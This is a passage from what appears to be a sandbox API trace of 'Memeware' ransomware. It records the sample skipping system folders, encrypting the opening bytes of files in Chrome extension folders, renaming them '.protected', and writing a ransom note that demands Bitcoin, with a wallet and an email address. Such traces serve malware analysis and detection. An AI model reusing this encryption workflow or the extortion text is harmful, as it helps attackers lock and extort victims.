| out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.885] CloseHandle (hObject=0x164) returned 1 [0083.885] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.885] lstrcmpiW (lpString1="nb", lpString2="Windows") returned -1 [0083.885] lstrcmpiW (lpString1="nb", lpString2="Program Files") returned -1 [0083.885] lstrcmpiW (lpString1="nb", lpString2="Program Files (x86)") returned -1 [0083.885] lstrcmpiW (lpString1="nb", lpString2="$Recycle.bin") returned 1 [0083.885] lstrcmpiW (lpString1="nb", lpString2="System Volume Information") returned -1 [0083.885] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb") returned 150 [0083.885] lstrcmpW (lpString1="nb", lpString2=".") returned 1 [0083.886] lstrcmpW (lpString1="nb", lpString2="..") returned 1 [0083.886] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\*") returned 152 [0083.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.886] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.886] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.886] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.886] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.886] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.886] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\.") returned 152 [0083.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.886] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.886] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.886] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.886] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.886] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.886] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.886] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\..") returned 153 [0083.886] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.886] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.886] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.886] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.886] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.886] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.886] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.886] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.886] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json") returned 164 [0083.887] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.887] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.887] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.887] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json") returned 164 [0083.887] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json") returned 164 [0083.887] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.887] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json") returned 164 [0083.887] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.887] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.889] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.889] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.889] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.890] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.890] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.890] CloseHandle (hObject=0x168) returned 1 [0083.890] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.protected") returned 174 [0083.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.protected")) returned 1 [0083.891] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.891] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.891] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\RESTORE_FILES.txt") returned 168 [0083.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.891] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.891] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.892] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.892] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.892] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.892] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.892] CloseHandle (hObject=0x164) returned 1 [0083.892] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.892] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0083.892] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0083.892] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0083.892] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0083.893] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0083.893] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl") returned 150 [0083.893] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0083.893] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0083.893] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\*") returned 152 [0083.893] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.893] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.893] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.893] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.893] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.893] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.893] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\.") returned 152 [0083.893] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.893] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.893] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.893] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.893] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.893] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.893] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.893] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\..") returned 153 [0083.893] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.893] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.893] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.893] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.893] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.893] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.893] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.894] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.894] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json") returned 164 [0083.894] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.894] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.894] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.894] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.895] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json") returned 164 [0083.895] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.895] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json") returned 164 [0083.895] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.895] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json") returned 164 [0083.895] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.895] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.897] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.897] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.897] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.897] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.897] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.897] CloseHandle (hObject=0x168) returned 1 [0083.897] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.protected") returned 174 [0083.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.protected")) returned 1 [0083.898] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.898] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.898] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\RESTORE_FILES.txt") returned 168 [0083.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.899] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.899] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.899] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.899] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.900] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.900] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 